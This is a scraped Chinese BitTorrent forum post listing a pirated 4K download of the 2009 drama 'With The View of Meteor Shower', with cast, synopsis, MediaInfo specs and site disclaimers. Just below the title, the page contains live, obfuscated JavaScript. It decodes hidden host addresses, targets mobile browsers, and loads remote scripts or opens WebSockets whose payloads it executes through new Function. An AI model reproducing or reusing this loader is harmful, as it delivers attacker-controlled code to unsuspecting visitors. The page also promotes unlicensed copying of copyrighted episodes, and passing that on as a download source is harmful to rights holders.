一起来看流星雨[全36集][国语中字.无水印][WEB-DL-MP4][2160P(4K)][Vampire][阿里云盘下载]

版主小s 2月前 221

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};


◎译 名 With The View of Meteor Shower

◎片 名 一起来看流星雨 / 流星雨

◎年 代 2009

◎产 地 中国大陆

◎类 别 剧情 / 喜剧 / 爱情

◎语 言 汉语普通话

◎上映日期 2009-08-08(中国大陆)

◎IMDb评分 5.5/10 from 24 users

◎IMDb链接 https://www.imdb.com/title/tt6686280

◎豆瓣评分 5.5/10 from 62750 users

◎豆瓣链接 https://movie.douban.com/subject/3546712

◎集 数 36

◎片 长 45分钟

◎导 演 丁仰国 Yang-Kuo Ting / 沈怡 Yi Shen

◎编 剧 娅子 Ya Zi / 于淼 Miao Yu / 王雪静 Xuejing Wang / 汪海林 Hailin Wang

◎主 演 郑爽 Shuang Zheng

张翰 Han Zhang

俞灏明 Haoming Yu

魏晨 Vision Wei

朱梓骁 Zixiao Zhu

彭杨 Yang Peng

肖涵 Han Xiao

陈一娜 Yina Chen

任珈锐 Jiarui Ren

殷叶子 Yezi Yin

宗峰岩 Fengyan Zong

黄志玮 Jerry Huang

陆虎 Hu Lu

楚轶男 Yinan Chu

李世鹏 Shipeng Li

徐志贺 Zhihe Xu

徐扬 Yang Xu

马剑琴 Jianqin Ma

米露 Lu Mi

边江 Jiang Bian

刘校妤 Xiaoyu Liu

王建新 Jianxin Wang

姜广涛 Guangtao Jiang


◎标 签 流星雨 | 青春 | 电视剧 | 雷 | 偶像剧 | 爱情 | 校园 | 山寨


◎简 介


楚雨荨(郑爽 饰)是一名品学兼优的女孩,理想是进入当地有名的贵族学院艾利斯顿商学院学习,但并不殷实的家境让这一理想变得难以实现。楚雨荨的舅舅四处筹钱终于成功把她送进了艾利斯顿。在艾利斯顿有四个贵族子弟慕容云海(张翰 饰)、端木磊(俞灏明 饰)、上官瑞谦(朱梓骁 饰)和叶烁(魏晨 饰),他们外形阳光帅气,家境富裕,被称为H4,成为全校大部分女生追捧的对象。楚雨荨对此却不以为然,这样的冷漠态度使得四个成天被人捧得很高的男生很吃惊,也因此结下了误会,处处互相较劲。然而,就在互相捉弄的过程中楚雨荨和四人竟然产生了亦敌亦友的感情,甚至和慕容云海和端木磊展开了一场三角恋……



General

Complete name : 一起来看流星雨.With.The.View.of.Meteor.Shower.2009.EP36.2160P(4K).WEB-DL.H265.AAC-Vampire.mp4

Format : MPEG-4

Format profile : Base Media

Codec ID : isom (isom/iso2/mp41)

File size : 1.63 GiB

Duration : 46 min 23 s

Overall bit rate mode : Variable

Overall bit rate : 5 028 kb/s

Movie name : 一起来看流星雨/With.The.View.of.Meteor.Shower

Album : 国产网络剧集系列

Performer : Vampire制作分享作品

Genre : 中国大陆

Recorded date : 2009

Writing application : Lavf58.27.103

Cover : Yes

Comment : 警告:严禁将任何作品用于商业性质活动,所有制作作品仅限于测试宽带之用,请于下载后24小时内删除。本人不承担任何法律后果!喜欢本作品请购买正版!!!


Video

ID : 1

Format : HEVC

Format/Info : High Efficiency Video Coding

Format profile : [email protected]@Main

Codec ID : hev1

Codec ID/Info : High Efficiency Video Coding

Duration : 46 min 23 s

Bit rate : 4 832 kb/s

Width : 3 840 pixels

Height : 2 160 pixels

Display aspect ratio : 16:9

Frame rate mode : Constant

Frame rate : 25.000 FPS

Color space : YUV

Chroma subsampling : 4:2:0

Bit depth : 8 bits

Bits/(Pixel*Frame) : 0.023

Stream size : 1.57 GiB (96%)

Color range : Limited

Color primaries : BT.709

Transfer characteristics : BT.709

Matrix coefficients : BT.709

Codec configuration box : hvcC


Audio

ID : 2

Format : AAC LC

Format/Info : Advanced Audio Codec Low Complexity

Codec ID : mp4a-40-2

Duration : 46 min 23 s

Bit rate mode : Variable

Bit rate : 192 kb/s

Maximum bit rate : 196 kb/s

Channel(s) : 2 channels

Channel layout : L R

Sampling rate : 44.1 kHz

Frame rate : 43.066 FPS (1024 SPF)

Compression mode : Lossy

Stream size : 62.9 MiB (4%)

Default : Yes

Alternate group : 1


TAGS 剧情 喜剧 爱情

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (1)

你可以在 登录 or 注册 后,对此帖发表评论!

返回